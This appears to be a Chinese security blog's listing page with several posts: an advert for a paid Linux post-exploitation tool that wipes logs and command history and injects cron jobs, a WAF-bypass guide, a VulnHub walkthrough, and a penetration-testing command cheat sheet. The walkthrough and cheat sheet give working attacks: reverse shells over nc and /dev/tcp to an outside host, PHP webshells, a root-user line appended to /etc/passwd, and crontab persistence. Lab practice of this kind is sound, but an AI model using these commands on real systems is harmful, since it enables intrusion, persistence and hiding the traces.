首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,877 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
67
篇与
的结果
2025-07-10
FeatherScan v4.0 - 适用于Linux的全自动内网信息收集工具
前言在平时渗透打靶的时候,经常要自己手工输入命令,做各种基本的信息收集,非常的繁琐,所以自研了一款工具,这款工具没有接入AI,因为不合适,接入了AI的话在一些不能上网的环境下进行信息收集,权限提升的分析,会非常的不方便,这款工具全都在目标机器本地执行(执行速度快,提高渗透测试效率),类似于fscan,需要上传到目标靶机上,后期会增加离线的POC和漏洞库对Linux系统进行全面的信息收集,和特权提升检测,获取方式见文末PS:如果有提权需要可以将这些收集到的信息,全部复制给AI分析就可以了,比如Venice Uncensored另外这个工具采用并行的执行方式,而不是同步执行,这样的话会显著提升脚本的执行速度,不然光一个IP内网扫描,你都够吃一顿肯德基了没有完美的工具,人也是,不可能做到人人都喜欢,不喜欢或者觉得垃圾,勿喷,您完全有使用别的工具的权力,比如开源的LinPEAS、LinEnum、Bashark等等,但都是英文的,有些师傅们可能看不懂,我也看不懂,可能是我没有文化吧,要手动去翻译很麻烦,而我这个是专为国人打造的Linux自动化内网信息收集工具。如果哪里有欠缺或者建议,欢迎师傅们批评和留言。概述FeatherScan是一款专为Linux系统设计的自动化内网渗透与特权提升扫描工具,由泷羽Sec作者白小羽开发。该工具旨在简化渗透测试过程中的内网信息收集和提权检测环节,通过自动化扫描显著减少手工操作时间,帮助安全研究人员高效识别系统弱点。V4.0主要功能1. 全面系统信息收集操作系统与内核信息、用户与组权限分析、环境变量深度检查、网络配置与路由信息、敏感文件权限审计、容器环境检测、服务与进程分析等等简单的内核提权漏洞检测(非常适合用来打靶机学习)2. 内网渗透扫描 主机发现:混合扫描技术(ICMP Ping + ARP分析 + TCP端口扫描),三种网络模式扫描,不忽漏掉每一个内网机器 端口扫描:支持常见服务端口识别 服务识别:自动检测开放服务及版本信息 隐身模式:慢速扫描避免触发IDS/IPS 常见的端口扫描3. 横向移动检测SSH密钥重用检测、密码爆破(SSH, MySQL, PostgreSQL, SMB等)、SMB共享匿名访问检测、数据库服务爆破等等。4. 特权提升检测SUID/SGID危险文件检测、sudo权限深度分析、可写路径检查、内核漏洞匹配(脏牛、脏管道等)、密码哈希分析、自动化漏洞利用(不需要联网)等等5. 安全痕迹管理自动备份/恢复修改文件、安全删除临时文件(7次覆盖)、命令历史清除、日志文件清理、内存缓存清除、本地爆破记录删除技术特点 智能交互式扫描动态启用深度检查、按需开启内网渗透扫描、交互式服务爆破确认等等 混合扫描技术ICMP Ping扫描、ARP缓存分析、TCP端口扫描、服务指纹识别等等 权限提升自动化自动添加特权用户、sudo权限自动化配置、定时任务注入、内核漏洞EXP自动下载等等 安全痕迹管理操作全程跟踪记录、多轮覆盖安全删除、服务专用日志清除等等 使用示例# 基础扫描 chmod +x FeatherScan ./FeatherScan # 启用深度检查+内网扫描 [?] 是否执行深入检查? y [?] 是否执行内网渗透扫描? y [?] 是否启用隐身模式? n输出示例 ███████╗███████╗ █████╗ ████████╗██╗ ██╗███████╗██████╗ ██╔════╝██╔════╝██╔══██╗╚══██╔══╝██║ ██║██╔════╝██╔══██╗ █████╗ █████╗ ███████║ ██║ ███████║█████╗ ██████╔╝ ██╔══╝ ██╔══╝ ██╔══██║ ██║ ██╔══██║██╔══╝ ██╔══██╗ ██║ ███████╗██║ ██║ ██║ ██║ ██║███████╗██║ ██║ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ 高级Linux特权提升扫描工具 泷羽Sec安全团队 | 白小羽 | v4.0 =================================================== 工具描述 ================================================= 1、Linux内网信息收集,全面收集操作系统/内核版本、环境变量、用户信息等关键数据 2、检测敏感文件权限、容器环境、服务配置等安全风险点,分析历史命令、环境变量、SSH配置等潜在攻击向量 3、智能主机发现(ARP/Ping/TCP混合扫描),多协议服务爆破(SSH/MySQL/SMB等),网络路由分析、DNS配置检测和代理设置审查 4、SUID/SGID文件扫描与危险程序识别,内核漏洞数据库匹配(脏牛、脏管道等),Sudo规则审计与配置弱点分析 5、Docker逃逸路径检测和容器安全评估,隐身扫描模式(避免触发IDS),自动化痕迹清除机制,敏感信息掩码保护 [-] 系统信息 [+] 当前用户: root [+] 主机名: Kali [+] 操作系统: Kali GNU/Linux Rolling [+] 内核版本: 6.12.25-amd64 [+] 扫描开始时间: Thu Jul 10 05:42:16 AM EDT 2025 [?] 是否执行深入检查? 普通检查: 快速检测常见提权向量 (SUID, 可写文件, 内核漏洞等) 深入检查: 包括普通检查 + 服务爆破 + 敏感文件深度扫描 [y/N] y [+] 深入检查已启用 [?] 是否执行内网渗透扫描? 内网扫描: 主机发现、端口扫描、横向移动检测 [y/N] n ################ 完整系统信息 ################ [-] 系统信息: 主机名: Kali 操作系统: Kali GNU/Linux Rolling 内核版本: 6.12.25-amd64 系统架构: x86_64 运行时间: up 3 days, 22 hours, 52 minutes [-] 用户信息: 当前用户: root 用户ID: uid=0(root) gid=0(root) groups=0(root) 特权用户: root test featheruser 。。。。。。。。。。。。。。。。。。。。。。。使用建议 授权测试:仅在获得明确授权的环境中使用 深度扫描:对关键系统启用深入检查模式 痕迹管理:扫描完成后使用内置清理功能 字典定制:根据目标环境定制pass.txt密码字典 2025.7.28 v4.5继上一篇本次也算是一个大更新1、融入了exploit-db离线Linux内核提权漏洞库,联动searchsploit工具,更方便的简化了渗透测试提权的过程2、融入了GTFOBins常用提权命令共50+个,比如常见的find,sh,pkexec,sudo,nmap,vim,less,tcpdump,Docker,zip,tar等等命令进行提权3、新增了常见的CMS敏感配置文件扫描,比如django,wordpress,joomla等等,通常用来查看数据库的账号密码4、新增敏感环境变量提权模块——PATH提权5、新增相关的免责条款,若不接受,则不能使用该工具下面来看看更新了哪些内容吧,首先是免责条款新增GTFOBins 50+命令提权新增内置GTFOBins提权数据库,无需联网,GTFOBins中的大部分提权方法皆可以利用!!并且满足一定的条件才会输出给你,比如suid,sudo,可读/可写等等,不满足任何一个条件,都不会告诉你利用方法(命令使用准确率还在优化)新增提权总结,以及使用方法,和成功率告知新增CMS常用配置文件检测新增敏感环境变量提权—PATH提权提权效果展示以及path提权,也会将提权方法在程序结束前告知新增exploit-db漏洞库新增Linux内核提权漏洞库(基于searchsploit),这里以tr0ll靶机为例子首先我们需要在Kali中创建自己的漏洞数据库(使用脚本的好处就是这个漏洞库 exploit-db 也就是searchsploit漏洞库是会更新的,使用命令searchsploit -u更新本地漏洞库),执行generate_vuln_db.sh会生成一个漏洞库的txt文件,主要是筛选Linux提权的漏洞将这个txt文件和FeatherScan同时上传到靶机上,使用FeatherScan就会利用内置强大的版本比较算法,进行检测,执行到最后我们得知漏洞编号之后,在Kali中就直接将使用searchsploit -m [编号]复制到当前目录,并使用python开启一个http服务上床到靶机上提权成功!其他细节优化更新了,系统存在bash -p命令提权,但是不出现提权信息问题(因为SUID和SGID同时存在,所以不能使用=4来进行判断)# 靶机 -bash-5.0$ ls /usr/bin/bash -l -rwsr-sr-x 1 root root 1183448 Feb 25 2020 /usr/bin/bash -bash-5.0$ stat -c '%a' "/usr/bin/bash" | cut -c 1 6修改后的执行结果新增手动选择是否尝试进行提权(文件可写的情况下),不然写入会导致一些问题工具获取加入泷羽Sec帮会即可(长期更新中。。。)单独购买不方便获取最新版本,优惠最后两天,错过只能等国庆节了。。。。获取方式加入泷羽Sec内部Freebuf帮会即可获取最新版本,往期版本会不定期在github上进行更新,在帮会主页中找到帮会网盘,即可下载工具啦,这工具没有那么高大上,只是简化了linux内网信息收集,端口扫描,内核漏洞利用,内网探测,痕迹清除等等,理性消费加入方式扫码即可更多福利点击查看https://mp.weixin.qq.com/s/ROMh7U4xj9nXqlKzBFd2WATips:一天存10块,一个月就是3000,一年就是36w,十年就是3600w,3600w可以干什么?上海一套别墅,记得买个带独立机房的,防震防溯源!一个稳定的家庭,给爸妈在老家盖栋最气派的养老别墅,请最好的管家和医护,医护团队人均CISSP+OSEP,至少也是OSCP。一台迈巴赫s680,车窗贴膜要用防弹级的,毕竟可能装满了0day漏洞报告!打工?还打什么工?老板?哪个老板?10年后你自己就是董事长!所以从现在开始养成一个好习惯,只要10年,从此只挖洞不上班,甲方需求全拉黑,开源项目随便PR!看到这里,您觉得这79块钱还贵吗?不过只是您的冰山一角,少买一个吃灰的云服务器,也就您吃的一顿科技料理的外卖,够我吃10顿。从现在开始投资自己吧。10年之后咱们顶峰相见、、、、、、那时候如果您还觉得贵,请开着您的迈巴赫来嘲讽我这个弱智,我将毫无怨言免责声明FeatherScan仅限合法安全审计和授权渗透测试使用。使用者应遵守当地法律法规,未经授权使用本工具造成的任何后果由使用者自行承担。文章首发于:https://longyusec.com/longyushoulu/450/泷羽Sec安全团队 | 白小羽 | 2025往期推荐Linux内网渗透(2w字超详细)AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_Docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透一个永久的渗透知识库
2025年07月10日
2,313 阅读
0 评论
0 点赞
2025-06-28
HW 中如何利用 WAF 缺陷进行绕过
在挖洞过程中,往往会遇到各种攻击利用被WAF拦截的情况,本文浅析总结了常见的一些绕过思路以及具体实现浅析WAF绕过在挖洞过程中,往往会遇到各种攻击利用被WAF拦截的情况,本文浅析总结了常见的一些绕过思路以及具体实现利用WAF的缺陷绕过1.1利用WAF性能缺陷-垃圾字符填充对于通用性较强的软WAF来说,不得不考虑到各种机器和系统的性能,故对于一些超大数据包、超长数据可能会跳过不检测因此可以填充大量垃圾字符来逃避WAF对数据包的检测如下1.2利用WAF性能缺陷-发送大量请求包可以采取高并发的攻击手段,WAF同样出于性能考虑可能会直接放行部分数据包。2.利用WAF适配组件的缺陷由于后端web容器、中间件、数据库、脚本语言的多样性,waf很难覆盖全,容易导致waf解析不了而后端可以正常解析读取导致的绕过IIS+asp在IIS+ASP的环境中,如果url中出现了百分号,但后面邻接的字符拼起来后又不在url编码表之内的话,ASP脚本处理时会将其忽略例如假设有如下请求xxx.asp?id=1 union se%lect 1,2,3,4 fro%m adm%inwaf规则不严放行后,后端由于该特性成功处理执行了xxx.asp?id=1 union select 1,2,3,4 from admin导致绕过TOMCATtomcat的特性也可以构造出许多绕过的方式,可以参考https://y4tacker.github.io/2022/06/19/year/2022/6/%E6%8E%A2%E5%AF%BBTomcat%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2%E7%BB%95waf%E6%96%B0%E5%A7%BF%E5%8A%BF/这篇文章1.参数前后添加空白字符绕过filename="1.jsp"的filename字符左右可以加上一些空白字符%20 %09 %0a %0b %0c %0d %1c %1d %1e %1f,比如%20filename%0a="1.jsp"这样导致waf匹配不到我们上传⽂件2.utf-16、cp037等各种编码绕过utf-16cp037(原始payload为' and (7=len(db_name())) and 'a' = 'a)json下的unicode编码3.利用waf适配协议的缺陷3.1畸形请求(与Web应用所处的中间件有关,在部分中间件下不适用)将HTTP请求头变为随机字符串例如xxxxT请求方法后加一个table等空字符使用get请求方法但带上post体(需要服务端能正常接受)3.2分块传输仅仅适用于post传输方法分块传输不少waf现在也都可以识别了,可以结合waf性能缺陷的思路综合利用-延时分块传输具体使用可以参考该项目 http://github.com/c0ny1/chunked-coding-converter3.3非预期请求方式get改为post、Content-Type: application/x-www-form-urlencoded改为multipart/form-data等跳过waf直接访问服务器寻找真实ip绕过云waf云waf通过配置NS或者CNAME记录,使得对网站的请求报文优先经过WAF主机,经过WAF主机过滤之后,将被认为无害的请求报文再送给实际的网站服务器进行请求,此时只要找到服务器的真实ip,修改host为服务器真是ip即可绕过云waf常见寻找真实ip的方式有如下几种1.证书信息查询 https://myssl.com/2.dns历史解析记录3.搜集子域名ip c段(考虑到费用问题,一些子域名并不会部署)4.超级ping......寻找没有部署waf的nginx反代机器当waf在nginx服务器上部署,且存在nginx集群时,可以试试尝试寻找能反代服务却又没用部署waf的机器访问进行绕过以下面这个为例,测试某接口发现被拦截搜集ip信息为xxx.xxx.200.1xx查找c段服务,一个个访问尝试利用成功利用waf白名单WAF存在某些机制,不处理和拦截白名单中的请求数据例如特定的ip,来自于搜索引擎爬虫的访问数据等特定ip可以使用https://github.com/TheKingOfDuck/burpFakeIP插件将xff等头部设置为127.0.0.1等进行绕过尝试搜索引擎爬虫的访问数据User-Agent修改为谷歌搜索引擎等原文链接:https://forum.butian.net/share/3639
2025年06月28日
1,571 阅读
0 评论
0 点赞
2025-06-20
靶机Misdirection: 1 ~ VulnHub
Misdirection: 1 ~ vulnhub下载链接见:https://download.vulnhub.com/misdirection/Misdirection.zip这里我们需要看首先我们使用arp-scan对内网主机进行发现随后对靶机进行端口扫描,有一个22端口ssh协议,80端口开启了http协议,还有3306的mysql数据库端口,8080也是http协议访问80端口,并从wappalyzer信息收集插件看到这个cms是Drupal随后点击进入到这个界面,告诉我们说这个系统是开源的,并且有源代码,还有一个下载选项登录框尝试万能密码,却限制了我们只能使用邮箱登录,随后我们尝试注册一个用户却提示了一个信息,无法发送电子邮件随后这里有一个Source Code源码,查看这个作者的源码中包含了一个admin,(其他代码信息没啥利用价值)尝试访问却提示管理因不安全通道而关闭突然发现我们目录扫描还没扫呢,通过扫描结果也能看到目标站点设置了防目录扫描功能切换思路,我们来到8080端口,意外的发现这是一个wordpress的内容管理系统按照常规的方式,首先是后台的爆破http://10.10.10.129:8080/wordpress/wp-admin但是呢它重定向到了另一个页面,而且这个页面并不是在当前的这个界面当我利用dirb进行目录扫描的时候呢,不扫wordpress这个命令,有一个debug发现了新的突破口当我想要创建一个交互式的终端的时候呢,发现使用su命令并不能正常的使用python3 -c 'import pty;pty.spawn("/bin/bash")'只能被迫使用nc进行反弹shell,反弹成功后就能利用su命令切换用户啦rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f接下来就是信息收集,一条龙下来就可,也可以使用自定义脚本学习文章参考:近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等全部获取完成后,你会发现几个关键的点,sudo 可以利用,有一个/bin/bash,但是需要brexit用户才能用奥还有个思路就是前端有wordpress,那么必定和数据库有交互,我们来看配置文件,能看到密码找到了第一个和密码相关的,那么这个密码是不是root用户的密码呢?很明显,不会让你这么轻易获得root权限的登录数据库mysql -ublog -pabcdefghijklmnopqrstuv找用户表破解失败了,不过不要紧我们继续回到那个sudo,他说了要求brexit用户才能执行那个/bin/bash,那么久指定一个用户吧sudo -u brexit /bin/bash相当的棒,提权成功,经过一番折磨后,该收集的信息都收集了,直到我翻到.viminfo,看到了用户编辑过/etc/passwd,这个文件主要记录了一些vim的编辑历史查看权限,这下不就有思路啦(那么多信息收集命令,既然少了这么重要的东西。。。。。。赶紧补上)然后我们仿照/etc/passwd的格式生成一个账号 bAIbAIxiaoyu 和密码123456,将这个用户分到root组下echo 'bAIbAIxiaoyu:$1$oFd2MoKR$eVjr6Fe7JWwjAPEfaTQSy.:0:0:root:/root:/bin/bash' >> /etc/passwd至此渗透结束往期推荐红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎!媲美DeepSeek,附源码【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入(sql十大注入类型):技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细
2025年06月20日
1,525 阅读
0 评论
0 点赞
2025-06-14
渗透测试命令汇总,常用的渗透测试命令大全
渗透测试命令汇总在正式开始之前推荐一个永久的渗透测试知识库点击下方蓝色字体即可加入奥!-----------⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇----------➡➡➡➡➡一个永久的渗透知识库,欢迎您的加入⬅⬅⬅⬅⬅-----------⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆----------下面就是我平时在打靶过程中常用的一些命令,有些可能会疏忽,不过会一直更新的一、TOP10利用1、文件包含类payload利用php://filter/read=convert.base64-encode/resource=index.phpphp://filter/resource=index.phpphp://filter/string.strip_tags|convert.base64-decode/resource=shell.phpdata://text/plain,<?php%20phpinfo();?>data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2bfile:///etc/passwdhttp://127.0.0.1/cmd.php?cmd=php://inputPOST数据:<?php phpinfo()?>curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa# 在文件包含中几个重要的文件/home/qiu/.ssh/id_rsa # 私钥chmod 600 ~/.ssh/id_rsa # 需要赋予权限,否则可能利用不成功,必须600ssh -i id_rsa root@10.10.10.200 # 使用密匙文件登录2、目录扫描类# gobuster添加UA,指定扫描的文件类型gobuster dir -u http://10.10.10.192/NickIzL33t/ -w /usr/share/wordlists/rockyou.txt -x txt,zip,php,html -H 'User-Agent:Mozilla/5.0 (iPhone; CPU iPhone OS............8.0 main%2F1.0 baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default' -s 200 -b '' -t 200# gobuster扫描指定的文件类型gobuster dir -u http://10.10.10.201/seeddms51x -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt -x html,txt,php,js# 使用dirb指定扫描的文件类型dirb http://192.168.5.139/w/h/i/s/p/e/r/the_abyss/ -X .txt .img .html# 其他自行查找# dirsearchpython3 dirsearch.py -e php,txt,zip -u https://target # 简单的查看网址目录和文件python3 dirsearch.py -e php,txt,zip -u https://target -w db/dicc.txt # 使用文件拓展名为php,txt,zip的字典扫描目标urlpython dirsearch.py -u http://xxxx -r # 递归扫描,不过容易被检测python dirsearch.py -u http://xxxx -r -t 30 # 线程控制请求速率python dirsearch.py -u http://xxxx -r -t 30 --proxy 127.0.0.1:8080 # 使用代理3、常见登录框万能密码' or 1=1 --+' or 1=1 -- +' or 1=1#" or 1=1 --+" or 1=1 -- +" || 1=1 -- +" || 1=1 --+" || 1=1 #二、信息收集1、基本信息收集Linuxuname -ahostname # 主机名# 系统信息相关lsb_release -acat /etc/os-releasecat /proc/version# 权限相关sudo -l # 查看可以使用sudo的文件find / -perm -4000 -print 2>/dev/null # 方式1:查找 SUID文件find / -perm -u=s -type f 2>/dev/null # 方式2:查找 SUID文件ls -al /etc/cron* # 查看所有计划任务cat /etc/crontabcrontab -lfind / -perm 777 -type f -u root 2>/dev/null # 查看文件权限为777的文件信息,root用户find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息# 其他信息收集ps -auxnetstat -tulnphistorypwd # 查看当前目录whoami # 查看当前用户grep -rno stapler # 筛选当前目录以及递归的子目录所有文件中包含stapler字符的文件,并显示行号Windows普通信息收集ipconfig /all # 查看所有网络信息,包括域和dnsnet view # 查看域内用户net localgroup administrators # 查看Administrators组的成员chdir # 查看当前目录netstat -ano # 查看进程信息systeminfo | findstr /i "system type" # 查看系统类型Windows信息收集进阶sc query WinDefend # 检查是否存在杀软Windows defenderWindows信息收集之MSFmeterpreter > run post/Windows/gather/enum_applications # 枚举已安装的软件meterpreter > run post/Windows/gather/enum_firewall # 检查防火墙状态meterpreter > run post/Windows/gather/enum_services # 枚举所有服务fscancd fscan//进入fscan文件夹# 执行在Windows下为fscan.exe,Linux下为./fscan# 例如./fscan -h 192.168.101.1/24 # 启动fscan并扫描网段fscan.exe -h 192.168.x.x # 默认使用全部模块fscan.exe -h 192.168.x.x -rf id_rsa.pub # redis 写私钥fscan.exe -h 192.168.x.x -c whoami # ssh爆破成功后,命令执行fscan.exe -h 192.168.x.x -m ms17010 # 指定模块fscan.exe -h 192.168.x.x -m ssh -p 2222 # 指定模块ssh和端口fscan.exe -h 192.168.x.x -h 192.168.1.1/24 # C段fscan.exe -h 192.168.x.x -h 192.168.1.1/16 # B段fscan.exe -h 192.168.x.x -h 192.168.1.1/8 # A段的192.x.x.1和192.x.x.254,方便快速查看网段信息fscan.exe -h 192.168.x.x -hf ip.txt # 以文件导入其他持续更新中。。。2、MYSQL相关# 常用报错mysql -uWordPress -pWordPressISBest -h 172.18.0.2 --skip-sslmysql -h10.233.117.225 -P3306 -uroot -p --ssl-mode=DISABLED# sql语句update tblUsers set pwd='e10adc3949ba59abbe56e057f20f883e' where login='admin';# sql信息收集以及利用方法SHOW VARIABLES LIKE 'secure_file_priv'; # 是否允许向外部写入文件# 接下来就向外部写文件# 通过修改日志文件路径,来构造一句话马SHOW VARIABLES LIKE 'general_log_file'; # 显示mysql日志文件路径,执行过的命令的文件路径set global general_log=on; # 开启查询日志set global general_log_file='D:\\\\phpstudy\\www\\shell.php'; # 设置查询日志存储路径select '<?php phpinfo();?>'; # 查询一句话set golbal general_log=off; # 最后关闭查询日志# phpmyadmin包含session文件# 1、首先创建一张表。2、写入一个字段为一句话木马 <?php @eval($_GET['123']);?>http://10.10.10.131:2003/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_3cfb6084f034677df82ef00120cce4fd3、通信类信息收集本地ip探测,Linux shell脚本# Linuxfor i in {1..254}; do (ping -c 1 172.18.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;Windows脚本,ip探测for/l %i in(1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"三、常用渗透命令1、Windowscmd下载certutil -urlcache -split -f http://192.168.93.20:5000/frpc.ini c:\mimikatz.exe # 从指定服务器下载文件taskkill /PID 356 /F # 强制结束进程信息powershell# 更新中2、Linux# 见信息收集反弹shell中的监听方socat监听本地端口socat TCP-LISTEN:4444 STDOUTnc监听本地端口nc -lvnp 1234三、交互式终端利用socat工具创建交互式终端并反弹shell(没有python的使用方法)./socat tcp:10.10.10.128:1234 exec:'/bin/bash -li',pty,stderr,sigint,sighup,sigquit,sane利用python创建交互式终端python -c 'import pty; pty.spawn("/bin/bash")';python2 -c 'import pty; pty.spawn("/bin/bash")';python3 -c 'import pty; pty.spawn("/bin/bash")';利用MSF创建交互式终端use post/multi/manage/shell_to_meterpreterset session 2 # 设置已经上线的会话run使用ssh创建密匙文件ssh-keygen -t rsa -b 4096# 回车# 回车# 回车# 靶机wget 10.10.10.130:5000/id_rsa.pubchmod 700 /tmp/forest/home/ubuntu/.ssh/cp id_rsa.pub /tmp/forest/home/ubuntu/.ssh/authorized_keyschmod 600 /tmp/forest/home/ubuntu/.ssh/authorized_keys# 对于低版本的openssh需要使用算法配置,下面是一些常用的排错方法ssh ubuntu@10.10.10.131 -oPubkeyAcceptedKeyTypes=+ssh-rsa -i id_rsassh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa -i rain_rsa ubuntu@10.10.10.131shell敲击(敲门)for x in 1466 67 1469 1514 1981 1986; do nmap -Pn -p $x 10.10.10.194; done# orknock 10.10.10.194 1466 67 1469 1514 1981 1986 -v一句话木马php、一句话马<?php @eval($_POST['pass']);?>rbash / shell 逃逸命令ssh username@IP "export TERM=xterm;python -c 'import pty;pty.spawn(\"/bin/bash\")'"wfuzz模糊测试相关# 安卓url爆破响应为200的结果(添加UA)wfuzz -u http://10.10.10.192:8008/NickIzL33t/FUZZ.html -w small_rockyou.txt -H 'User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS............8.0 main%2F1.0 baiduboxapp/13.40.0.10 (Baidu; P2 15.5) NABar/1.0 themeUA=Theme/default' --sc 200# 普通url爆破响应为200的结果wfuzz -u http://10.10.10.192:8008/NickIzL33t/FUZZ.html -w small_rockyou.txt --sc 200# 筛选出响应长度在100到100000之间的结果wfuzz -u http://10.10.10.200/test.php?FUZZ=/etc/passwd -w /data/SecLists_Dict/Discovery/Web-Content/small_common.txt--ss "^(.{100,100000})$"# 指定从1开始模糊测试wfuzz -u http://10.10.10.203/WordPress/?page_id=FUZZ -z range,1-1000 --sc 200密码爆破类别1、hydra爆破海德拉爆破网页post表单(-f爆破成功一个就停止),^USER^和^PASS^分别代表的用户名和密码的变量,Invalid表示排除字段,即出现了这个字段表示爆破失败hydra -l rmichaels -P /usr/share/wordlists/fasttrack.txt -t 4 -vV 192.168.209.132 http-post-form "/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid"海德拉爆破ssh / rdp(win远程)hydra -l rmichaels -P /usr/share/wordlists/fasttrack.txt -t 4 -vV 192.168.209.132 ssh海德拉爆破SMBproxychains hydra -l Administrator -P pass.txt \-s 445 -t 4 -vV -m "SMB" \SMB://192.168.138.1382、zip压缩包密码爆破fcrackzip -D -p pass.txt -u t0msp4ssw0rdz.zip3、WordPress后台爆破wpscan --url http://10.10.10.203/WordPress -e u -P /data/SecLists_Dict/Passwords/darkweb2017-top10000.txt隐藏通信类代理reGeorg (http / https隧道)python2 reGeorgSocksProxy.py -u http://10.10.10.129:8000/tunnel.php # 这样会开启一个本地代理到8888端口,挂在后台vi /etc/proxychains4.conf # 修改最后一行为代理的端口和ip地址MSF代理添加路由route # 查看路由信息run autoroute -s 172.18.0.0/24 # 添加路由表run autoroute -p # 查看路由表情况进行内网探测(ip存活数量)以及端口扫描use auxiliary/scanner/portscan/tcpset session 3set rhosts 172.18.0.0/24runfrp代理工具的使用方法# kalipython -m http.server 443# 靶机cd /tmpcurl -O 10.10.10.128:443/frpccurl -O 10.10.10.128:443/frpc.inichmod +x frpc# kali./frps -c frps.ini# 靶机./frpc -c frpc.inimicrosocks 轻量级的socks代理工具microsocks -1 -i listenip -p port -u user -P password -b bindaddr # 参数绑定microsocks -b 0.0.0.0 -p 1080 # 不用密码直接用ssh端口转发ssh -CfNg -L 2021:192.168.110.132:3389 kali@192.168.110.128# 132是靶机,128是kali# 解释:这条命令的作用,在攻击机上建立一个本地ssh服务器的ssh隧道# 将本地的2021端口的流量通过这个隧道转发到远程主机192.168.110.132的3389端口# 重点如下:# 这样,当你在本地机器上访问攻击机kali本地的2021端口时,实际上访问的是远程主机192.168.110.132的3389端口lcx端口转发wget http://www.vuln.cn/wp-content/uploads/2016/06/lcx_vuln.cn_.zip# windows靶机lcx.exe -slave 192.168.110.128(攻击机IP) 4444 127.0.0.1 3389# kali./portmap -m 2 -p1 4444 -h2 192.168.110.128 -p2 5555Linux其他命令强制终止一个进程netstat -tulnpsudo kill -9 $(sudo lsof -t -i:8888)docker系列docker安装,修改源deb http://mirrors.aliyun.com/ubuntu/ jammy main restricted universe multiversedeb-src http://mirrors.aliyun.com/ubuntu/ jammy main restricted universe multiversedeb http://mirrors.aliyun.com/ubuntu/ jammy-security main restricted universe multiversedeb-src http://mirrors.aliyun.com/ubuntu/ jammy-security main restricted universe multiversedeb http://mirrors.aliyun.com/ubuntu/ jammy-updates main restricted universe multiversedeb-src http://mirrors.aliyun.com/ubuntu/ jammy-updates main restricted universe multiversedeb http://mirrors.aliyun.com/ubuntu/ jammy-backports main restricted universe multiversedeb-src http://mirrors.aliyun.com/ubuntu/ jammy-backports main restricted universe multiverseecho '源' > /etc/apt/sources.listapt-get updateapt-get install docker.iodocker逃逸低版本docker run --rm -it -v /:/tmp/1/ WordPress /bin/bashcd /tmp/1cat flag_3特权逃逸(利用条件:管理员启动容器执行docker run —privileged)mkdir /tmp/forest # 创建一个文件夹mount /dev/sda1 /tmp/forest # 挂载磁盘ls /tmp/forest # 查看挂载后的磁盘内容docker信息收集ls -alh /.dockerenv # 判断是否为docker环境,存在则是,进行下一条命令,不存在则否cat /proc/1/cgroup # 通过控制组(cgroup)信息判断容器化环境反弹shell绕过1、bash绕过bash -c '/bin/bash -i >& /dev/tcp/10.10.10.128/1234 0>&1' # 利用 -c 来执行命令2、写计划任务也可以用来进行docker逃逸echo "/bin/bash -i >& bash -i >& /dev/tcp/10.10.10.130/1234 0>&1">> /tmp/forest/tmp/shell.shchmod +x /tmp/forest/tmp/shell.shcat /tmp/forest/tmp/shell.sh# 写入crontab计划任务,表示每隔1分钟以root权限执行一次计划echo '*/1 * * * * root bash /tmp/shell.sh' > /tmp/forest/etc/crontabcat 